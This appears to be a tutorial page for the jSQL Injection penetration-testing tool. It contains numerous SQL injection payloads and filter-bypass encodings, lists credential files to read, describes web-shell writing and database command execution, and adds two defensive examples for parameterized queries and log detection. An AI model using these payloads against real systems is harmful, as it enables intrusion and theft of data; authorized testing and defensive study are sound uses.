
jSQL Injection

jSQL Injection is an open-source automated SQL injection testing tool featuring a user-friendly graphical interface. It enables security professionals to detect and exploit SQL injection vulnerabilities in web applications during authorized penetration testing and vulnerability assessment.

The tool supports multiple database systems and injection techniques, and provides automated database enumeration, data extraction, and exploitation capabilities for comprehensive SQL injection testing.

  • Java Runtime Environment (JRE) 8 or higher
  • 2GB RAM minimum
  • Network access to target
  • GUI environment (X11 on Linux)
# Download latest release
wget https://github.com/ron190/jsql-injection/releases/download/v0.84/jsql-injection-v0.84.jar

# Verify Java installation
java -version

# Run application
java -jar jsql-injection-v0.84.jar
# Install Java
sudo apt-get update
# Full JDK (the -headless JRE has no GUI support) plus Maven for the source build
sudo apt-get install openjdk-11-jdk maven

# Download jSQL
git clone https://github.com/ron190/jsql-injection.git
cd jsql-injection

# Build from source
mvn clean install

# Run
java -jar target/jsql-injection-*-all.jar
# Install Java via Homebrew
brew install openjdk@11
# Resolve the Homebrew prefix (differs between Intel and Apple Silicon installs)
export PATH="$(brew --prefix openjdk@11)/bin:$PATH"

# Download and run
wget https://github.com/ron190/jsql-injection/releases/download/v0.84/jsql-injection-v0.84.jar
java -jar jsql-injection-v0.84.jar
# Build Docker image
docker build -t jsql-injection .

# Run with display
docker run -it -e DISPLAY=$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  jsql-injection

# Headless with API mode
docker run -d -p 8080:8080 jsql-injection --api
| Component | Purpose |
|---|---|
| URL Bar | Target URL input field |
| Injection Panel | Configure injection parameters |
| Method Selector | GET/POST/HTTP method |
| Database Type | MySQL, PostgreSQL, Oracle, SQL Server |
| Payload Panel | View generated payloads |
| Results Pane | Display retrieved data |
| Console Tab | Technical details and logs |
# Launch GUI
java -jar jsql-injection-v0.84.jar

# GUI loads with:
# - Target URL input field
# - HTTP method selector (GET/POST)
# - Database selection dropdown
# - Injection technique options
# - Results display panels
# Enter URL in target field
# Examples:
http://target.com/page.php?id=1
https://site.com/search.php?q=user

# jSQL works with:
# - GET parameters: ?id=1
# - POST form data
# - HTTP headers (User-Agent, Cookie, etc.)
# - AJAX requests

# URL variations
http://target.com/page.php?id=1                    # Basic parameter
http://target.com/page.php?id=1'                   # Test parameter
http://target.com/page.php?id=1' AND '1'='1       # Manual test
http://target.com/page.php?id=1) AND ('1'='1      # Parenthesis context
# Select method through GUI dropdown

# GET Request
# - Parameters in URL query string
# - jSQL appends payloads to URL

# POST Request
# - Parameters in request body
# - Configure in POST data field
# - Form parameters sent in body

# Custom Headers
# - User-Agent injection
# - Cookie injection
# - Custom header values
# - Referer manipulation
# Configure POST data
username=admin&password=test

# Add multiple parameters
id=1&name=test&email=user@site.com

# Cookie-based injection
# Insert into Cookie field in jSQL
sessionid=abc123def456

# Header injection
# X-Custom-Header: value'

# User-Agent injection
# Mozilla/5.0' OR '1'='1
# jSQL attempts detection through:
# 1. Error messages (MySQL, PostgreSQL, Oracle)
# 2. Timing-based responses
# 3. Payload-specific reactions
# 4. DBMS fingerprinting

# Supported databases:
# - MySQL
# - PostgreSQL
# - Oracle
# - Microsoft SQL Server
# - SQLite
# - H2
# - Sybase
# - IBM DB2
# Through GUI:
# Database dropdown menu selection

# Testing each database:
# 1. Enter URL
# 2. Select database type from dropdown
# 3. Configure parameters
# 4. Run detection/exploitation
# 5. jSQL tests with appropriate payloads
# jSQL configuration:
# - Select "Boolean" detection method
# - Configure TRUE/FALSE responses
# - Set comparison logic

# Method flow:
# 1. jSQL injects conditions: AND 1=1 (true), AND 1=2 (false)
# 2. Compares response differences
# 3. Extracts data bit-by-bit
# 4. Slower but stealthy

# Example payloads:
id=1' AND '1'='1          # True response
id=1' AND '1'='2          # False response
id=1' AND SUBSTRING(database(),1,1)='m'  # Extract data
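
Added example (not part of the original page or the jSQL project): a regression check for the boolean technique above, run against a constructed in-memory SQLite table. It sends the page's TRUE/FALSE probes to a string-concatenated query and to a parameterized one and reports whether the responses differ; the `products` table and all function names are assumptions made for illustration.

```python
import sqlite3

# The two probes from the example payloads above, without the "id=" prefix.
TRUE_PROBE = "1' AND '1'='1"
FALSE_PROBE = "1' AND '1'='2"


def make_db():
    """Constructed sample data: a two-row table keyed by a text id."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [("1", "widget"), ("2", "gadget")])
    return db


def lookup_concat(db, item_id):
    """'Before' form: the input is spliced into the SQL text."""
    sql = "SELECT name FROM products WHERE id = '" + item_id + "'"
    return db.execute(sql).fetchall()


def lookup_param(db, item_id):
    """Hardened form: the input is bound as data and never parsed as SQL."""
    return db.execute("SELECT name FROM products WHERE id = ?",
                      (item_id,)).fetchall()


def has_boolean_oracle(lookup, db):
    """True when the TRUE and FALSE probes yield different responses,
    which is the difference a boolean-based tool relies on."""
    return lookup(db, TRUE_PROBE) != lookup(db, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_param):
        print(fn.__name__, "boolean oracle:", has_boolean_oracle(fn, db))
```

A check like `has_boolean_oracle` can sit in a unit test suite so that a later refactor back to string concatenation fails the build.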
# jSQL configuration:
# - Select "Time" detection method
# - Set time threshold (default: 5 seconds)
# - Configure delay mechanism

# Method flow:
# 1. Inject delays: SLEEP(5), BENCHMARK(1000000, MD5('a'))
# 2. Measure response time
# 3. Infer true/false from timing
# 4. Extract data through delays

# Example payloads:
id=1' AND SLEEP(5) AND '1'='1    # True = 5+ sec delay
id=1' AND SLEEP(0) AND '1'='1    # False = no delay
id=1' AND IF(1=1, SLEEP(5), 0)  # Conditional delay
# jSQL configuration:
# - Select "Error" technique
# - Enable error message display
# - Configure response parsing

# Method flow:
# 1. Craft payloads triggering errors
# 2. Parse database error messages
# 3. Extract data from error content
# 4. Fastest method but noisier

# Example payloads:
id=1' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -
id=1' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -
id=1' UNION ALL SELECT NULL,database()-- -
# jSQL configuration:
# - Determine column count
# - Identify column data types
# - Build UNION queries

# Automatic column detection:
# 1. Try incremental UNION SELECT statements
# 2. Identify number of columns
# 3. Test each column for data extraction
# 4. Build final exploitation query

# Example payloads:
id=1' UNION SELECT NULL,NULL,NULL-- -
id=1' UNION SELECT database(),user(),version()-- -
id=1' UNION SELECT GROUP_CONCAT(table_name),2,3 FROM information_schema.tables WHERE table_schema=database()-- -
# Through jSQL GUI:
# 1. Tabs appear after successful detection
# - Database tab
# - Tables tab
# - Columns tab
# - Data tab

# Automatic enumeration:
# - Select target database from dropdown
# - jSQL retrieves table list
# - Expand tables to see columns
# - Extract data on demand

# Key information retrieved:
# - Database names
# - Table names
# - Column names and types
# - Data contents
# - User information
# Via jSQL interface:
# 1. Click "Database" tab
# 2. Select database from list
# 3. jSQL auto-loads tables
# 4. Click table to expand columns
# 5. View column names and inferred types

# Alternative manual enumeration:
# Query: SELECT table_name FROM information_schema.tables
# WHERE table_schema=database()

# Common tables to check:
# - users / accounts / admin
# - products / items / content
# - orders / transactions
# - logs / activity
# - configuration / settings
# jSQL workflow:
# 1. Navigate to target table
# 2. Click "Dump" or "Extract" button
# 3. jSQL retrieves all records
# 4. Display in results panel
# 5. Export to file if needed

# Size limitations:
# - Adjust chunk size for large tables
# - jSQL handles pagination
# - Progress shown during extraction
# - Partial results available immediately
# MySQL file reading:
# SELECT LOAD_FILE('/etc/passwd')
# SELECT LOAD_FILE('C:\\windows\\win.ini')

# jSQL exploitation:
# 1. Select "File" option if available
# 2. Enter file path
# 3. jSQL constructs payload
# 4. Retrieve file contents

# Common target files:
# Linux:
# /etc/passwd
# /etc/shadow
# /root/.ssh/id_rsa
# /var/www/html/config.php
# /home/user/.bash_history

# Windows:
# C:\\windows\\win.ini
# C:\\windows\\system32\\config\\SAM
# C:\\inetpub\\wwwroot\\web.config
# MySQL file writing (if privileges allow):
# SELECT ... INTO OUTFILE '/path/to/file'

# jSQL method:
# 1. Select "File Write" option
# 2. Enter target path
# 3. Provide payload content
# 4. jSQL writes to file

# Exploitation scenarios:
# - Write web shell to web directory
# - Create .php backdoor
# - Modify configuration files
# - Insert malicious code
# Database system command execution:

# MySQL (if UDF available):
# sys_exec()

# MSSQL:
# xp_cmdshell

# PostgreSQL:
# copy (SELECT '') to program 'command'

# jSQL checks and attempts:
# 1. Detect DB system
# 2. Check for execution functions
# 3. Construct payload
# 4. Execute and retrieve output
# jSQL generates payloads for:
# - Current injection technique
# - Selected database type
# - Configured encoding
# - Bypass filters if applicable

# View generated payload:
# Check "Console" tab in jSQL
# Shows raw SQL being executed
# Useful for understanding injection

# Custom payloads:
# If automatic fails, craft manual payloads
# Copy from console
# Modify and retest
# jSQL provides template
# jSQL includes bypass techniques for:

# Comment removal filters
# - Use alternative comment syntax
# - MySQL: /*! code */
# - Nested comments

# Keyword filters
# - Case variation: SELECT, select, sELeCt
# - URL encoding: %53%45%4c%45%43%54
# - Unicode encoding
# - Hex encoding

# Whitespace filters
# - Tab characters: \t
# - Newline characters: \n
# - Parenthesis: UNION()SELECT

# Encoding options in jSQL:
# - URL encoding
# - Hex encoding
# - Double URL encoding
# - Unicode encoding
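
Added example (not part of the original page or the jSQL project): a log-review sketch showing why detection has to normalize a request before matching, given the case, comment, whitespace and URL-encoding variations listed above. The signature set, function names and log lines are constructed for illustration, and Unicode and hex encodings are not handled here.

```python
import re
from urllib.parse import unquote_plus

# Signatures for payload families named on this page, matched after normalization.
SIGNATURES = {
    "union": re.compile(r"\bunion\b(?:\s+all)?[\s()]*select\b"),
    "time": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "schema": re.compile(r"\binformation_schema\b"),
    "file": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
    "boolean": re.compile(r"'\s*(?:and|or)\s*'?\d+'?\s*=\s*'?\d+"),
}
# Request target and User-Agent from a combined-format access log line.
LOG_RE = re.compile(
    r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def normalize(raw, max_rounds=3):
    """Undo the listed variations so one signature covers every variant."""
    text = raw
    for _ in range(max_rounds):                 # single and double URL encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*!?\d*|\*/", " ", text)   # unwrap /*! ... */ and /**/
    text = re.sub(r"\s+", " ", text)            # tabs and newlines
    return text.lower()                         # case variation

def classify(line):
    """Sorted signature names found in the request target or User-Agent."""
    m = LOG_RE.search(line)
    if not m:
        return []
    fields = normalize(m.group("target")) + "\n" + normalize(m.group("ua"))
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(fields))

def scan(lines):
    """(line number, matched signatures) for every line with a hit."""
    return [(i, hits) for i, ln in enumerate(lines, 1) if (hits := classify(ln))]

# Constructed sample log lines (documentation address range, not real traffic).
SAMPLE_LOG = """
203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] "GET /page.php?id=1%27%20uNiOn%09SeLeCt%20NULL,NULL-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2025:10:00:02 +0000] "GET /page.php?id=1%2527%2520AND%2520SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2025:10:00:03 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0' OR '1'='1"
""".strip().splitlines()

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits)
```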
# Configure through Settings/Preferences:

# Proxy settings:
# - HTTP proxy address
# - Proxy port
# - Authentication credentials
# - SOCKS proxy support

# SSL/TLS options:
# - Certificate verification
# - Self-signed certificate handling
# - Client certificate configuration

# Connection settings:
# - Timeout duration
# - Retry attempts
# - Connection pool size
# - User agent configuration
# jSQL export options:
# - CSV format
# - JSON format
# - XML format
# - SQL INSERT statements
# - Text file

# Export from GUI:
# 1. Select data in results pane
# 2. Right-click → Export
# 3. Choose format
# 4. Select location
# 5. jSQL saves file

# Command-line export (if available):
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --database=mysql \
  --export=csv \
  --output-file=results.csv
# Documentation of findings:

# Information to document:
# - Target URL
# - Injection point (parameter name)
# - Injection technique used
# - DBMS identified
# - Databases accessible
# - Tables and columns retrieved
# - Sample extracted data
# - Severity assessment

# Sample report content:
cat > SQL_Injection_Report.txt << EOF
Target: http://target.com
Parameter: id
Technique: Error-based Union
DBMS: MySQL 5.7.14
Databases: information_schema, mysql, test, application

Tables in 'application':
- users (id, username, password, email)
- products (id, name, price, stock)
- orders (id, user_id, product_id, amount)

Sample data retrieved:
- User count: 152
- Admin users: 3
- Default configuration: Yes
EOF
# Run without GUI:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --technique=error \
  --database=mysql

# Output results to file:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --output=/path/to/results.txt

# Batch testing:
java -jar jsql-injection.jar \
  --list-of-urls=targets.txt \
  --batch-mode
  • Obtain written authorization before testing
  • Define clear scope and boundaries
  • Test on dedicated test systems when possible
  • Notify infrastructure teams in advance
  • Document all activities and findings
  • Follow responsible disclosure procedures
  • Maintain confidentiality of data accessed
# 1. Reconnaissance Phase
# - Identify vulnerable parameters
# - Test basic SQLi syntax
# - Determine database type
# - Assess difficulty level

# 2. Exploitation Phase
# - Select optimal technique
# - Extract database structure
# - Retrieve sensitive data
# - Assess data sensitivity

# 3. Analysis Phase
# - Document vulnerabilities
# - Determine severity
# - Identify root cause
# - Recommend fixes

# 4. Reporting Phase
# - Detail findings
# - Provide proof of concept
# - Suggest remediation
# - Support remediation efforts
# Prevention measures:
# - Test on staging systems
# - Create snapshots before testing
# - Limit scope to assigned areas
# - Avoid data modification (read-only testing)
# - Document baseline before testing
# - Monitor for unexpected behavior

# Testing workflow:
# 1. Start with information gathering
# 2. Minimal impact testing first
# 3. Progress to exploitation
# 4. Stop testing once confirmed
# 5. Clean up and document
| Issue | Solution |
|---|---|
| Target not responding | Check connectivity, verify URL, adjust timeout |
| No SQLi detected | Target may be patched, try other parameters |
| Database type wrong | Verify through error messages, test manually |
| Data extraction slow | Adjust technique, increase timeout, reduce data size |
| WAF blocking requests | Use proxy, change encoding, adjust timing |
# Enable verbose output:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --verbose

# Check console tab in GUI for:
# - Generated payloads
# - Server responses
# - Detection details
# - Error messages

# Common error messages:
# "No DBMS detected" - SQLi not present or filtered
# "Connection timeout" - Network or firewall issue
# "403 Forbidden" - WAF blocking requests
  • SQLMap automated SQL injection tool
  • OWASP SQL Injection prevention guide
  • SQL injection attack methodologies
  • Web application security testing frameworks
  • Database security hardening
  • Prepared statements and parameterized queries